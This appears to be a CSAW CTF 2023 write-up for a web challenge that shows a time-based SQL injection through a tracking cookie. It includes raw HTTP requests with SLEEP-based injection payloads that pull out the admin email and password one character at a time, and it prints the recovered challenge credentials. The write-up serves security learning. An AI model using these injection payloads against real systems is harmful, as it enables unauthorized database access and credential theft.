CSAW CTF 2023-Writeup

MTA Prices

Time-based SQli

How to identify

You can leverage the trackID in the cookie to manipulate the session content, which the server sends back in the response header.

Also, modifying the trackID to an unintended value causes the email field in the session to display an “Error“ message.

Importantly, this presents an opportunity to manipulate user input to create anomalies.

Untitled

Untitled

Proof of Concept

1
2
3
4
GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBk'+sleep(5)+'O4Fp2KuGsB;
Connection: keep-alive

The email showing no error means the SQL commands have been successfully executed.

Untitled

Exploitation

Replace ARG1 and ARG2 with your dictionaries…

ARG1: Numbers ranging from 0 to 20

ARG2: All printable characters, ASCII 32 to 126

Get admin’s email:

1
2
3
4
GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB'+(SELECT IF((select SUBSTRING(email,${ARG1},1) from users where privilege LIKE 'admin%' limit 0,1)=binary('${ARG2}'),SLEEP(10),'a'))+';
Connection: keep-alive

Get admin’s password:

1
2
3
4
5
GET / HTTP/1.1
Host: web.csaw.io:5800
Cookie: trackingID=lAApPkDuBkO4Fp2KuGsB'+(SELECT IF((select SUBSTRING(password,${ARG1},1) from users where email='emily.brown@mta.com' limit 0,1)=binary('${ARG2}'),SLEEP(1),'a'))+';
Connection: keep-alive

Untitled

1
2
mail - > emily.brown@mta.com
password -> p#2r@5ml8q7v!9x$1

Untitled

Reference

https://www.kirsle.net/wizards/flask-session.cgi

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md#extract-database-with-information_schema

https://superboy-zjc.github.io/2020/08/05/阶段四、Web渗透测试/7、SQL注入/#二、SQL注入的注入点